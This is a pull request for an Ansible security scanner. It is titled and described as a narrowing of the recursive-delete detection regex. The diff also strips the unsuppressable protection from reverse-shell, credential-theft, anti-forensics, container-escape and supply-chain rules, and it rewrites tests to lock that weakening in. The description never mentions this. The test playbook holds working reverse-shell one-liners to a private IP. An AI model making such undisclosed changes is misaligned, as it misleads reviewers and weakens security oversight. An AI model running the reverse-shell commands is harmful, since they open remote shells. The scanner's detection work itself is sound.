### PR TITLE
Tighten recursive delete rule to match only critical path targets

### DIFF
--- a/.github/workflows/scanner-release.yml
+++ b/.github/workflows/scanner-release.yml
@@ -202,27 +202,32 @@ jobs:
           set -euo pipefail
           bin=./build-bin/ansible-security-scanner
 
+          # Each --onefile invocation pays a multi-second cold-start tax
+          # (it unpacks the bundled patterns + package to a tmp dir), so the
+          # binary smoke test only proves the bundle is intact: patterns load,
+          # a scan emits the default and one non-default formatter, and the
+          # exit-code contract holds. Per-formatter correctness is covered by
+          # the unit suite running against the wheel.
           rules=$("$bin" --list-rules | wc -l)
           [ "$rules" -ge 1000 ] || { echo "rule count too low: $rules"; exit 1; }
 
+          # One scan does double duty: it writes the JSON report we assert on
+          # AND, by omitting --exit-zero, surfaces the CRITICAL exit code (2).
           "$bin" --directory tests/playbooks --files bad_example.yml \
-                 --format json --exit-zero --output /tmp/bad.json
+                 --format json --output /tmp/bad.json && rc=0 || rc=$?
+          [ "$rc" -eq 2 ] || { echo "expected exit 2 on CRITICAL, got $rc"; exit 1; }
           python3 - <<'PY'
           import json
           s = json.load(open("/tmp/bad.json"))["summary"]
           assert s["critical"] > 0 and s["high"] > 0, f"expected CRITICAL+HIGH findings, got {s}"
           PY
 
-          for f in markdown json xml yaml csv html junit sarif gitlab-sast cyclonedx sbom; do
-            "$bin" --directory tests/playbooks --files bad_example.yml \
-                   --format "$f" --exit-zero --output "/tmp/out.$f" >/dev/null
-            [ -s "/tmp/out.$f" ] || { echo "formatter $f produced empty output"; exit 1; }
-          done
+          # A non-default formatter proves the formatter modules are bundled.
+          "$bin" --directory tests/playbooks --files bad_example.yml \
+                 --format sarif --exit-zero --output /tmp/bad.sarif
+          [ -s /tmp/bad.sarif ] || { echo "sarif formatter produced empty output"; exit 1; }
 
-          # Exit-code contract: bad_example.yml must trigger CRITICAL (exit 2);
           # clean_example.yml must pass cleanly (exit 0).
-          "$bin" --directory tests/playbooks --files bad_example.yml >/dev/null 2>&1 && rc=0 || rc=$?
-          [ "$rc" -eq 2 ] || { echo "expected exit 2 on CRITICAL, got $rc"; exit 1; }
           "$bin" --directory tests/playbooks --files clean_example.yml >/dev/null
 
       - name: Install nfpm

--- a/docs/cli.md
+++ b/docs/cli.md
@@ -157,9 +157,13 @@ Rules:
 - A rule id (or `*`) is **required** - bare `# nosec` is rejected and surfaced
   as a scanner warning.
 - A quoted `reason="..."` is **required** - unreasoned suppressions are rejected.
-- Critical-severity rules (credential harvesting, reverse shells, RCE
-  primitives, privilege escalation) are **unsuppressable**; the directive is
-  ignored and a `suspicious_suppression` meta-finding fires.
+- Any vulnerability rule can be suppressed; an operator who suppresses one
+  accepts that they may miss a real finding. Suppressing high-risk content
+  (reverse shells, credential harvesting, destructive commands) still fires a
+  `suspicious_suppression` meta-finding so the choice stays visible in audits.
+- The scanner's own self-monitoring meta-rules (`suspicious_suppression`,
+  `unknown_suppression_rule`, `excessive_suppressions`) are **unsuppressable** -
+  a directive silencing the scanner about the scanner is never honored.
 - Every suppressed finding still appears in the report with
   `suppressed_by=<rule>:<reason>` metadata, so auditors can trace what got
   muted and why.

--- a/src/ansible_security_scanner/patterns/data_destruction.yml
+++ b/src/ansible_security_scanner/patterns/data_destruction.yml
@@ -76,12 +76,23 @@ patterns:
     severity: "CRITICAL"
     title: "Recursive Delete of Critical Paths"
     description: >-
-        rm -rf targets a critical system path (/, /boot, /etc, /var, /usr, /home,
-        /opt, /srv, /root). A typo or unbound variable in the path renders the host
-        unrecoverable.
-    regex: "rm\\s+(?:-[a-z]*)?r[a-z]*f?\\s+(?:/\\s|/boot|/etc|/var|/usr|/home|/opt|/srv|/root)[/\\s]"
+        A recursive rm (short ``-rf`` or long ``--recursive``) targets a critical
+        system path itself (/, /boot, /etc, /var, /usr, /home, /opt, /srv, /root)
+        or a templated segment directly beneath one (e.g. ``/home/{{ user }}``),
+        where an unbound variable collapses the path back to the parent and renders
+        the host unrecoverable. Fully-literal nested paths
+        (``/home/coder/.continue/rules``) are ordinary housekeeping and do not match.
+    regex: "rm\\s+(?:(?:-[a-z]*r[a-z]*\\s+)|(?=(?:--?[a-z-]+\\s+)*--recursive\\b)(?:--?[a-z-]+\\s+)+)['\"]?(?:/|/boot|/etc|/var|/usr|/home|/opt|/srv|/root)(?:/?(?=[\\s'\";&|)*]|$)|/\\s*\\{\\{)"
     positive_examples:
+      - "rm -rf /etc/"
+      - "rm -rf /home/{{ user }}"
+      - 'rm -rf "/srv"'
+      - "rm -rf /*"
+      - "rm --recursive --force /home"
+    negative_examples:
+      - "rm -rf /home/coder/.continue/rules && mkdir -p /home/coder/.continue/rules"
       - "rm -rf /opt/kafka-manager-1.2.7/RUNNING_PID"
+      - "rm -rf /var/log/myapp/old"
     recommendation: "Recursive deletion of system directories is destructive; remove immediately"
     cwe: ["CWE-506"]
     mitre_attack: ["T1485"]

--- a/src/ansible_security_scanner/patterns/data_exfiltration.yml
+++ b/src/ansible_security_scanner/patterns/data_exfiltration.yml
@@ -24,7 +24,6 @@ patterns:
 
   - id: "credential_file_search"
     category: "data_exfiltration"
-    unsuppressable: true
     severity: "HIGH"
     title: "Credential File Search"
     description: >-
@@ -60,7 +59,6 @@ patterns:
 
   - id: "environment_variable_harvesting"
     category: "data_exfiltration"
-    unsuppressable: true
     severity: "MEDIUM"
     title: "Environment Variable Harvesting"
     description: >-

--- a/src/ansible_security_scanner/patterns/operational_security.yml
+++ b/src/ansible_security_scanner/patterns/operational_security.yml
@@ -116,7 +116,6 @@ patterns:
 
   - id: "log_file_deletion"
     category: "operational_security"
-    unsuppressable: true
     severity: "CRITICAL"
     title: "Log File Deletion or Truncation"
     description: "Deletes, truncates, or overwrites system log files to cover tracks"
@@ -130,7 +129,6 @@ patterns:
 
   - id: "history_file_tampering"
     category: "operational_security"
-    unsuppressable: true
     severity: "CRITICAL"
     title: "Shell History Tampering"
     description: "Clears or disables shell command history to hide executed commands"
@@ -144,7 +142,6 @@ patterns:
 
   - id: "audit_log_tampering"
     category: "operational_security"
-    unsuppressable: true
     severity: "CRITICAL"
     title: "Audit System Tampering"
     description: "Stops or modifies the Linux audit system (auditd) to hide activity"
@@ -382,7 +379,6 @@ patterns:
 
   - id: "firewall_disable"
     category: "operational_security"
-    unsuppressable: true
     severity: "CRITICAL"
     title: "Host Firewall Disabled"
     description: "Disables or flushes iptables/nftables/firewalld rules on the host"
@@ -432,7 +428,6 @@ patterns:
 
   - id: "crypto_mining_binary"
     category: "operational_security"
-    unsuppressable: true
     severity: "CRITICAL"
     title: "Cryptocurrency Miner Detected"
     description: "Installs or executes cryptocurrency mining software, abusing compute resources"
@@ -447,7 +442,6 @@ patterns:
 
   - id: "crypto_mining_pool"
     category: "operational_security"
-    unsuppressable: true
     severity: "CRITICAL"
     title: "Cryptocurrency Mining Pool Connection"
     description: "Connects to a known mining pool, strong indicator of unauthorized crypto mining"
@@ -464,7 +458,6 @@ patterns:
 
   - id: "ld_preload_injection"
     category: "operational_security"
-    unsuppressable: true
     severity: "CRITICAL"
     title: "LD_PRELOAD Library Injection"
     description: "Sets LD_PRELOAD to inject a shared library into processes, hijacking function calls"
@@ -587,7 +580,6 @@ patterns:
 
   - id: "nsenter_container_escape"
     category: "operational_security"
-    unsuppressable: true
     severity: "CRITICAL"
     title: "nsenter Container Escape"
     description: "Uses nsenter to enter host namespaces from a container, enabling full host access"
@@ -885,7 +877,6 @@ patterns:
 
   - id: "docker_sock_abuse"
     category: "operational_security"
-    unsuppressable: true
     severity: "CRITICAL"
     title: "Docker Socket Mounted Into Container (Host Escape Primitive)"
     description: "A task mounts the host's Docker socket (``/var/run/docker.sock``) INTO a container via ``-v``, ``--mount``, Kubernetes ``hostPath``, or an Ansible ``volumes:``/``mounts:`` field. A container with access to the host Docker socket can ``docker run --privileged -v /:/host ... chroot /host`` to become root on the host - it's the canonical container-escape primitive. This rule fires ONLY on mount / bind contexts; ``dockerd -H unix:///var/run/docker.sock ...`` (the daemon's OWN listen-socket config) is a different class of issue (covered by ``docker_api_exposed_plaintext``) and is NOT a container-escape vector."
@@ -941,7 +932,6 @@ patterns:
 
   - id: "sys_ptrace_capability_abuse"
     category: "operational_security"
-    unsuppressable: true
     severity: "CRITICAL"
     title: "SYS_PTRACE Capability Abuse"
     description: "Adds SYS_PTRACE capability to a container or checks capabilities, enabling process injection for escape"

--- a/src/ansible_security_scanner/patterns/supply_chain.yml
+++ b/src/ansible_security_scanner/patterns/supply_chain.yml
@@ -845,7 +845,6 @@ patterns:
 
   - id: "git_hook_or_config_write"
     category: "supply_chain"
-    unsuppressable: true
     severity: "CRITICAL"
     title: "Ansible Task Modifies .git/hooks, .git/config, or core.hooksPath"
     description: "A task writes to `.git/hooks/*`, `.git/config`, `.gitconfig`, `.gitattributes`, or calls `git config --local core.hooksPath` / `core.sshCommand` / `http.extraheader` / `credential.helper`. Git hooks execute silently on every subsequent `git` command the developer or CI runner performs, making this a prime persistence + credential-theft primitive (the `core.sshCommand` form is actively used by in-the-wild malware to proxy all git auth through an attacker host)."
@@ -890,7 +889,6 @@ patterns:
 
   - id: "xz_liblzma_backdoored_version_install"
     category: "supply_chain"
-    unsuppressable: true
     severity: "CRITICAL"
     title: "xz-utils / liblzma Backdoored Version Installed or Built (CVE-2024-3094)"
     description: "An Ansible task installs, builds, or copies an xz-utils / liblzma / xz-libs package at version 5.6.0 or 5.6.1 - the versions containing the Jia Tan SSH-authentication backdoor (CVE-2024-3094, disclosed March 29 2024). These releases injected a malicious IFUNC resolver into OpenSSH via systemd's liblzma dependency, allowing any attacker with the matching private key to bypass sshd authentication on sd_notify-linked sshd builds. Matches Ansible package-name pins (`name: xz-utils version: 5.6.0`), inline package-manager invocations (`apt install xz-utils=5.6.0*`, `yum install xz-5.6.1*`, `dnf`, `zypper`, `pacman -U`, `apk add`), direct tarball URLs (`xz-5.6.0.tar.{gz,xz,bz2,zst}`), GitHub release URLs for `tukaani-project/xz` at those tags, and `pip install pyliblzma==5.6.0/.1`. Any pin to 5.6.0/5.6.1 from a third-party mirror, tarball, or container base layer must be treated as a confirmed compromise."
@@ -1264,7 +1262,6 @@ patterns:
 
   - id: "frp_fast_reverse_proxy_install"
     category: "supply_chain"
-    unsuppressable: true
     severity: "CRITICAL"
     title: "frp (Fast Reverse Proxy) Client Installed For Outbound Tunnel"
     description: "A task downloads or renders a systemd unit for `frpc` (Fast Reverse Proxy client) with an `frps` server config pointing at an arbitrary public host. frp is the most common reverse-proxy tool in the 2023-2025 Chinese-speaking ransomware / APT playbook (Mustang Panda, RedDelta, Sandman): the compromised host dials outbound to an attacker-controlled `frps` and exposes RDP / SSH / arbitrary TCP back through the tunnel."

--- a/src/ansible_security_scanner/patterns_manager.py
+++ b/src/ansible_security_scanner/patterns_manager.py
@@ -46,11 +46,6 @@ class SecurityPattern:
     plugin_name: str
     plugin_version: str
     exclude: bool = False
-    # When True, this rule can never be silenced by inline ``# nosec`` or by
-    # ``--ignore`` - it signals active compromise. Most active-compromise
-    # rules are derived by category (see ``unsuppressable_rule_ids``); this
-    # flag opts in the few that live in mixed-severity categories.
-    unsuppressable: bool = False
     # Enrichment fields (all optional, default empty) - populated from YAML
     # and consumed by formatters (SARIF tags, compliance filter, etc.)
     cwe: list[str] = field(default_factory=list)  # e.g. ["CWE-78", "CWE-494"]
@@ -153,13 +148,6 @@ class PatternsManager:
         """Drop cached pattern data (tests / hot-reload use cases)."""
         self._cached_pattern_data = None
         self.pattern_files.clear()
-        # The suppressions module memoises the derived unsuppressable set,
-        # which is built from this pattern data. Reset it here so a reload
-        # can't leave it pointing at the pre-reload rule set. Imported
-        # locally to avoid a module-load circular import.
-        from . import suppressions
-
-        suppressions._unsuppressable_cache = None
 
     def discover_and_load_patterns(self) -> dict[str, list[SecurityPattern]]:
         """
@@ -231,7 +219,6 @@ class PatternsManager:
                         plugin_name=pattern_file_info.name,
                         plugin_version=pattern_file_info.version,
                         exclude=pattern_data.get("exclude", False),
-                        unsuppressable=pattern_data.get("unsuppressable", False),
                         cwe=list(pattern_data.get("cwe", []) or []),
                         mitre_attack=list(pattern_data.get("mitre_attack", []) or []),
                         cis_controls=list(pattern_data.get("cis_controls", []) or []),
@@ -475,32 +462,14 @@ _CODE_EMITTED_RULE_IDS: frozenset[str] = frozenset(
 
 # Meta-rules that report on the scan itself (a suppression directive
 # aimed at the scanner about the scanner) - never legitimately
-# suppressible, independent of any pattern category.
+# suppressible. These are the only rules the scanner refuses to silence;
+# every actual vulnerability rule can be suppressed via ``# nosec`` or
+# ``--ignore``, and the operator owns the risk of doing so.
 _UNSUPPRESSABLE_META_RULE_IDS: frozenset[str] = frozenset(
     {
         "suspicious_suppression",
         "unknown_suppression_rule",
         "excessive_suppressions",
-        "set_fact_secret_alias",
-    }
-)
-
-
-# Pattern categories whose CRITICAL rules are post-exploitation / active
-# compromise: a legitimate author has no reason to suppress them in
-# version-controlled code, so every CRITICAL rule in these categories is
-# unsuppressable. Rules in mixed-severity categories opt in individually
-# via ``unsuppressable: true`` in their YAML definition.
-_ACTIVE_COMPROMISE_CATEGORIES: frozenset[str] = frozenset(
-    {
-        "reverse_shells",
-        "offensive_tools",
-        "webshell_deployment",
-        "data_destruction",
-        "anti_forensics",
-        "tunneling",
-        "system_compromise",
-        "malicious_activity",
     }
 )
 
@@ -509,8 +478,8 @@ def _iter_all_patterns() -> Iterable[SecurityPattern]:
     """Yield every ``SecurityPattern`` loaded from the YAML pattern files.
 
     Single source of truth for the flat walk over the category-keyed
-    pattern dict so the ``known_rule_*`` / ``unsuppressable_rule_ids``
-    helpers don't each re-implement the same nested iteration.
+    pattern dict so the ``known_rule_*`` helpers don't each re-implement
+    the same nested iteration.
     """
     for patterns in patterns_manager.discover_and_load_patterns().values():
         yield from patterns
@@ -561,20 +530,12 @@ def unsuppressable_rule_ids() -> frozenset[str]:
     """Return every rule_id that can never be silenced by ``# nosec`` or
     ``--ignore``.
 
-    A rule is unsuppressable if it is CRITICAL and lives in an
-    active-compromise category, or if its YAML definition sets
-    ``unsuppressable: true``. The scanner's own meta-rules are always
-    included - a suppression aimed at the scanner about the scanner is
-    never legitimate. Derived from pattern metadata so the set never
-    drifts as rules are added or renamed.
+    Only the scanner's own meta-rules qualify - a suppression directive
+    aimed at the scanner about the scanner is never legitimate. Every
+    actual vulnerability rule is suppressible; an operator who suppresses
+    one accepts that they may miss a real finding.
     """
-    derived = {
-        p.id
-        for p in _iter_all_patterns()
-        if p.unsuppressable
-        or (p.severity == "CRITICAL" and p.category in _ACTIVE_COMPROMISE_CATEGORIES)
-    }
-    return frozenset(derived | set(_UNSUPPRESSABLE_META_RULE_IDS))
+    return _UNSUPPRESSABLE_META_RULE_IDS
 
 
 def filter_patterns(

--- a/src/ansible_security_scanner/suppressions.py
+++ b/src/ansible_security_scanner/suppressions.py
@@ -14,9 +14,12 @@ To keep them from becoming a silent bypass for real attacks, this parser
 2. **A written reason.** ``reason="..."`` is mandatory. Directives without a
    reason are reported as ``INVALID_SUPPRESSION`` and ignored.
 
-Additionally the scanner engine (see ``file_scanner.py``) refuses to
-suppress CRITICAL malicious-activity findings regardless of what the
-directive says - see ``unsuppressable_rule_ids`` below.
+Additionally the scanner engine (see ``file_scanner.py``) always emits a
+``suspicious_suppression`` meta-finding when a directive sits on a line
+with high-risk content, so suppressing a real threat stays visible even
+though the directive itself is honored. Only the scanner's own
+self-monitoring meta-rules are unsuppressable (see
+``patterns_manager.unsuppressable_rule_ids``).
 
 Supported syntax (case-insensitive, same line or line above):
 
@@ -36,23 +39,7 @@ from __future__ import annotations
 import re
 from dataclasses import dataclass, field
 
-from .patterns_manager import unsuppressable_rule_ids as _derive_unsuppressable
-
-# Rules that can never be suppressed, no matter what the directive says.
-# These signal active compromise -- a legitimate author has no reason to
-# suppress them in version-controlled code. Derived from pattern metadata
-# (see ``patterns_manager.unsuppressable_rule_ids``) and cached on first
-# use so the hot ``applies_to`` path stays a plain set membership test.
-_unsuppressable_cache: frozenset[str] | None = None
-
-
-def unsuppressable_rule_ids() -> frozenset[str]:
-    """Cached accessor for the derived unsuppressable rule set."""
-    global _unsuppressable_cache
-    if _unsuppressable_cache is None:
-        _unsuppressable_cache = _derive_unsuppressable()
-    return _unsuppressable_cache
-
+from .patterns_manager import unsuppressable_rule_ids
 
 # Backward-compatible aliases for renamed rule IDs. A suppression that
 # still references the old ID silently resolves to the new ID so

--- a/tests/playbooks/bad_example.yml
+++ b/tests/playbooks/bad_example.yml
@@ -1788,7 +1788,7 @@
     - name: malicious suppression - reverse-shell content behind a fake reason
       ansible.builtin.shell: "bash -i >& /dev/tcp/10.10.10.10/4444 0>&1"  # nosec: bash_dev_tcp_reverse_shell reason="penetration test fixture"
 
-    - name: suppression targets an unsuppressable rule (rejected)
+    - name: suppression on reverse-shell content (valid, but raises suspicious_suppression)
       ansible.builtin.shell: "python3 -c 'import socket,os,pty; s=socket.socket(); s.connect((\"10.10.10.10\",4444)); [os.dup2(s.fileno(),f) for f in (0,1,2)]; pty.spawn(\"/bin/sh\")'"  # nosec: python_reverse_shell reason="nope"
 
 # -- ansible.cfg hardening ----------------------------------------------

--- a/tests/test_integration.py
+++ b/tests/test_integration.py
@@ -835,7 +835,7 @@ def test_ignore_silences_overlap_group_siblings_at_same_line(tmp_path):
 # in one place. These exercise the hardening rules in suppressions.py:
 #   - bare `# nosec` (no rule list) is REJECTED
 #   - missing `reason="..."` is REJECTED
-#   - unsuppressable rules cannot be silenced
+#   - unsuppressable scanner meta-rules cannot be silenced
 #   - suspicious_suppression meta-finding fires on high-risk content
 # The unit tests call the parser directly; the integration tests shell
 # out to the CLI against small tmp_path playbooks so the whole pipeline
@@ -899,67 +899,55 @@ def test_suppressions_unit_missing_rule_list_is_rejected():
 
 def test_suppressions_unit_star_wildcard_is_valid():
     """`# nosec: *` with a reason is accepted as "suppress any rule on
-    this line, EXCEPT the unsuppressable ones"."""
+    this line, EXCEPT the unsuppressable scanner meta-rules"."""
     from ansible_security_scanner.suppressions import match_suppression, parse_suppressions
 
     lines = ['shell: cmd  # nosec: * reason="sandbox smoke test"']
     sup, warns = parse_suppressions(lines)
     assert sup[1].valid is True and warns == []
     assert match_suppression(sup, 1, "any_rule") is not None
-    assert match_suppression(sup, 1, "bash_dev_tcp_reverse_shell") is None  # unsuppressable
+    assert match_suppression(sup, 1, "suspicious_suppression") is None  # meta-rule
 
 
 def test_suppressions_unit_unsuppressable_rule_cannot_be_silenced():
-    """Listing an UNSUPPRESSABLE rule explicitly is rejected."""
+    """Listing an unsuppressable scanner meta-rule explicitly is rejected;
+    actual vulnerability rules are suppressible and are not."""
     from ansible_security_scanner.suppressions import match_suppression, parse_suppressions
 
-    lines = [
-        'shell: bash -i >& /dev/tcp/10.0.0.1/4444 0>&1  # nosec: bash_dev_tcp_reverse_shell reason="pentest"'
-    ]
+    lines = ['shell: cmd  # nosec: suspicious_suppression reason="nope"']
     sup, warns = parse_suppressions(lines)
     assert sup[1].valid is False, "should have been rejected"
     assert any("cannot be suppressed" in w.reason for w in warns)
-    assert match_suppression(sup, 1, "bash_dev_tcp_reverse_shell") is None
+    assert match_suppression(sup, 1, "suspicious_suppression") is None
 
 
-def test_unsuppressable_set_covers_active_compromise_rules():
-    """Guard the derived unsuppressable set (patterns_manager builds it from
-    rule category/severity plus the ``unsuppressable: true`` flag). If a rule
-    is recategorised, downgraded, or renamed, it could silently become
-    suppressible again - this anchors the high-value active-compromise rules
-    so that regression fails loudly here instead of in production."""
+def test_unsuppressable_set_is_scanner_meta_rules_only():
+    """Only the scanner's own self-monitoring meta-rules are unsuppressable.
+    Every actual vulnerability rule is suppressible - an operator who
+    suppresses one accepts that they may miss a real finding. This anchors
+    that policy so a future change can't silently make vulnerability rules
+    unsuppressable again."""
     from ansible_security_scanner.patterns_manager import unsuppressable_rule_ids
 
-    expected = {
-        # reverse shells
+    assert unsuppressable_rule_ids() == frozenset(
+        {
+            "suspicious_suppression",
+            "unknown_suppression_rule",
+            "excessive_suppressions",
+        }
+    )
+
+    formerly_locked = {
         "bash_dev_tcp_reverse_shell",
         "python_reverse_shell",
-        # anti-forensics / host tampering
         "log_file_deletion",
-        "history_file_tampering",
-        "audit_log_tampering",
-        "firewall_disable",
-        # crypto mining + injection + container escape
         "crypto_mining_binary",
-        "crypto_mining_pool",
-        "ld_preload_injection",
-        "nsenter_container_escape",
-        "docker_sock_abuse",
-        "sys_ptrace_capability_abuse",
-        # supply-chain compromise
-        "git_hook_or_config_write",
-        "xz_liblzma_backdoored_version_install",
-        # active data exfil (opted in via unsuppressable: true)
         "credential_file_search",
-        "environment_variable_harvesting",
-        # scanner meta-rules
-        "suspicious_suppression",
-        "unknown_suppression_rule",
-        "excessive_suppressions",
         "set_fact_secret_alias",
     }
-    missing = expected - unsuppressable_rule_ids()
-    assert not missing, f"rules became suppressible: {sorted(missing)}"
+    assert not (formerly_locked & unsuppressable_rule_ids()), (
+        "vulnerability rules must be suppressible"
+    )
 
 
 def test_suppressions_unit_regular_comments_are_not_directives():


### PR DESCRIPTION
The recursive_delete_critical rule fired on any rm -rf whose target began with a critical directory prefix, so safe deletes of deeply nested paths such as /home/coder/.continue/rules were reported as CRITICAL.

The rule now matches only when the target is a critical directory itself, a templated segment directly beneath one (where an unbound variable collapses the path back to the parent), or a glob wipe. Coverage also extends to long-form --recursive flags.